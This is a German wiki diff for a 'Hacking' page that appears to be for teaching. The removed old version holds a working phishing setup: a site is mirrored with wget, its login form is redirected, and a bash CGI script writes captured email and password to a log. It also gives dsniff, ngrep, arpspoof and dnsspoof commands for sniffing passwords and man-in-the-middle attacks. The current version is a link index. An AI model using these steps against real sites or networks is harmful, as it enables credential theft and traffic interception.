Hacking: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(131 dazwischenliegende Versionen von 8 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
=webseite spiegeln=
+
=Zusammenstellung=
apt-get install apache2
+
*[[Hacking für Administratoren]]
cd /var/www/
+
*[[Openvas]]
rm -r html
+
*[[Greenbone Security Manager]]
==abziehen der Seite==
+
*[[Sslcheck]]
wget -l 1 -r http://www.schmeich.de
+
*[[lynis]]
mv  http://www.schmeich.de html
+
*[[Unix-PrivEsc]]
*besser mit browser
+
*[[Hafnium]]
 +
*[[Hak5]]
 +
*[[Post Exploitation]]
 +
*[[Alfa AWUS036ACH]]
 +
*[[RDP Hijacking]]
 +
*[[Spezielle Suchmaschinen]]
 +
*[[Fake Access Point]]
 +
*[[STARTTLS]]
 +
*[[Holepunching]]
 +
*[[Passwörter Begriffe]]
 +
*[[dirsearch]]
 +
*[[wpscan]]
 +
*[[LibreOffice Makrolücke Hack (CVE-2022-3140)]]
 +
*[[Fake Web Seiten]]
  
==manipulation== 
+
= Labore =
ersetze in index.html
 
action="https://www.schmeich.de/login.php?login_attempt=1&lwv=110"
 
durch
 
action="http://www.schmeich.de/cgi-bin/login.cgi"
 
  
==cgi erstellen==
+
* [[Juice Shop]]
/usr/lib/cgi-bin/login.cgi
 
<pre>
 
#!/bin/bash
 
if [ "$REQUEST_METHOD" = "POST" ]; then
 
    if [ "$CONTENT_LENGTH" -gt 0 ]; then
 
        read -n $CONTENT_LENGTH POST_DATA <&0
 
    fi
 
fi
 
MAIL=$(echo $POST_DATA | cut -f 2 -d "&")
 
PASS=$(echo $POST_DATA | cut -f 3 -d "&")
 
echo "$MAIL $PASS" >> /tmp/geheim.log
 
  
cat<<HERE
+
=Kali=
 +
*[https://tools.kali.org/tools-listing Kali Linux Tools]
 +
=Verschlüsselung=
 +
*[[Verschlüsselung]]
  
<!doctype html>
+
=Schwachstellen=
 +
*https://portal.cert.dfn.de/adv/archive/
 +
=Password Check=
 +
*[[Password Check]]
  
<html>
+
=SSL Check=
<meta http-equiv="refresh" content="0; url=https://www.schmeich.de/" />
+
*[[SSL Check]]
</html>
 
HERE
 
</pre>
 
  
=ettercap=
+
=Projekt=
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/
+
*[[Man in the Middle Website]]
 +
*[[Vulnerable Wordpress]]
  
=dsniff=
+
=VTrust=
 +
*[[VTrust]]
 +
 
 +
*[[Exemplarischer Angriff]]
 +
=Tools=
 +
*[[linux boot hacking]]
 +
*[[network-tools]]
 +
*[[tor]]
 +
*[[bruteforce-passwords]]
 +
*[[fail2ban]]
 +
*[[spoofing]]
 +
*[[netcat]]
 +
*[[tcpdump]]
 
*[[Ettercap]]
 
*[[Ettercap]]
 +
*[[arpspoof]]
 +
*[[dsniff]]
 +
*[https://www.tecmint.com/monitor-ethernet-activity-in-linux/ arpwatch]
 +
*[[tcpkill]]
 +
*[[webspy]]
 +
*[[ike-scan]]
 +
*[[Dnsspoof]]
 +
*[[p0f]]
 +
*[[nast]]
 +
*[[Ngrep]]
 +
*[[Nmap]]
 +
*[[Zmap]]
 +
*[[arp-scan]]
 +
*[[Hping3]]
 +
*[[sslstrip]]
 +
*[[Mitproxy]]
 +
*[[Password Hacking]]
 +
*[[Windows7 Konto zurück setzen]]
 +
*[[Windows 10 Passwort zurücksetzen]]
 +
*[[Goohost]]
 +
*[[Wlan Hacking]]
 +
*[[Metasploit]]
 +
*[[Metasploit und armitage]]
 +
*[[recon-ng]]
 +
*[[SSL Man in the Middle]]
 +
*[[HTST]]
 +
*[[netexpect]]
 +
*[[Recording SSH sessions]]
 +
*[[Portforwarding]]
 +
*[[Proxychains]]
 +
*[[Socksify]]
 +
*[[InSpy]]
 +
*[[unicornscan]]
 +
*[[sipvicious]]
 +
*[[voip-hacking]]
 +
*[[OWASP]]
 +
*[[25 SANS]]
 +
*[[Zeroconf]]
 +
*[https://www.aldeid.com/wiki/Multiple-ways-to-remotely-control-a-Windows-machine Multiple-ways-to-remotely-control-a-Windows-machine]
 +
*https://blogs.sap.com/2017/05/07/top-10-ssl-security-vulnerability-and-solution-part-1/
 +
*http://www.heise.de/security/artikel/Schnellstart-mit-Kali-Linux-2209798.html
 +
*https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/
  
== Dsniff Tools ==
+
=Manuelle Kontrolle=
'''Installation unter Ubuntu oder Debian'''
+
*[[Behandlung kompromitierter Systeme]]
apt-get install dsniff
 
'''Passwörter spionieren mit dsniff - Beispiele'''
 
==Dsniff==
 
'''sniffen'''
 
dsniff -n -i eth1 -s 1500 host  85.10.194.199 -w geheim.dat
 
 
'''auswerten'''
 
dsniff -r geheim.dat
 
-----------------
 
02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp)
 
USER wuschel
 
PASS suxa
 
 
'''optionen'''
 
-n                  =  numerische Ausgabe                 
 
-i eth1            =  Schnittstelle 
 
-s 1500            =  Länge des Mitschnittes pro Paket
 
-w geheim.dat      =  schreibe in die Datei 
 
host 85.10.194.199  =  Muster wie bei tcpdump
 
-r geheim.dat      =  lese aus der Datei
 
 
 
==Tcpkill==
 
tcpkill port 80
 
 
'''optionen'''
 
port 80            =  Muster wie bei tcpdump
 
 
 
==Arpspoof==
 
arpspoof -t 192.168.254.7 192.168.254.5
 
 
'''optionen'''
 
-t 192.168.254.7  = Angriffszeil
 
192.168.254.5      = Mac Adresse wird mit lokaler MacAdresse vertauscht
 
 
 
==Webspy==
 
mozilla&
 
webspy 192.168.254.22 
 
 
 
==Dnsspoof==
 
'''Der Nameserver muss umgeleitet werden'''
 
ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/
 
 
'''hosts anlegen'''
 
192.168.254.4    www.xinux.de
 
 
'''dnsspoofen'''
 
dnsspoof -f hosts
 
 
 
== Ngrep ==
 
'''Installation unter Ubuntu oder Debian'''
 
apt-get install ngrep
 
'''Passwörter spionieren mit ngrep - Beispiele'''
 
'''sniffen'''
 
ngrep -d eth1 -s 1500 -l -i 'PASS|USER'  port 21
 
  
'''optionen'''
+
*[[Manuelle Kontrolle]]
-d eth1            =  Schnittstelle
 
-s 1500            =  Länge des Mitschnittes pro Paket
 
-l                =  Ausgabe wird zeilenweise gepuffert
 
-i                =  Ignoriere Gross und Kleinschreibung 
 
'PASS|USER'        =  Suchmuster in den Daten PASS oder USER
 
port 21            =  Muster wie bei tcpdump
 

Aktuelle Version vom 14. August 2023, 10:08 Uhr

Zusammenstellung

Labore

Kali

Verschlüsselung

Schwachstellen

Password Check

SSL Check

Projekt

VTrust

Tools

Manuelle Kontrolle